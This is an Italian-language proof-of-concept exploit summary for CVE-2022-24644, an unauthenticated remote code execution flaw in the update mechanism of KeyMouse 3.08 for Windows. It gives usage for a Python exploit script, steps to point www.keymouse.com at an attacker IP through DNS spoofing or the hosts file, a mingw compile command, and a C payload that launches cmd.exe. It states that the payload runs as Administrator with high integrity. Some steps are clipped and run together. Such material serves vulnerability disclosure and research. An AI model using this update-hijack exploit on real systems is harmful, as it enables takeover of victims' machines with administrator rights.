
Exploit proof-of-concept per CVE-2022-24644, che dimostra l'esecuzione remota di codice non autenticata tramite spoofing DNS contro il meccanismo di aggiornamento di KeyMouse Windows 3.08.
ZZ Inc. KeyMouse 3.08 (Windows) Vulnerabilità di esecuzione remota di codice non autenticata tramite aggiornamento
Uso: python3 cve-2022-24644_poc.py
Dettagli nel report su gerr.re.
www.keymouse.com sull'IP dell'attaccante;
c:\windows\system32\drivers\etc\hosts sul target.
proof.c sull'attaccante, ad esempio usando i686-w64-mingw32-gcc proof.c -o proof.exe;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
Di conseguenza, proof.exe viene eseguito nel contesto dell'utente Administrator con integrità alta.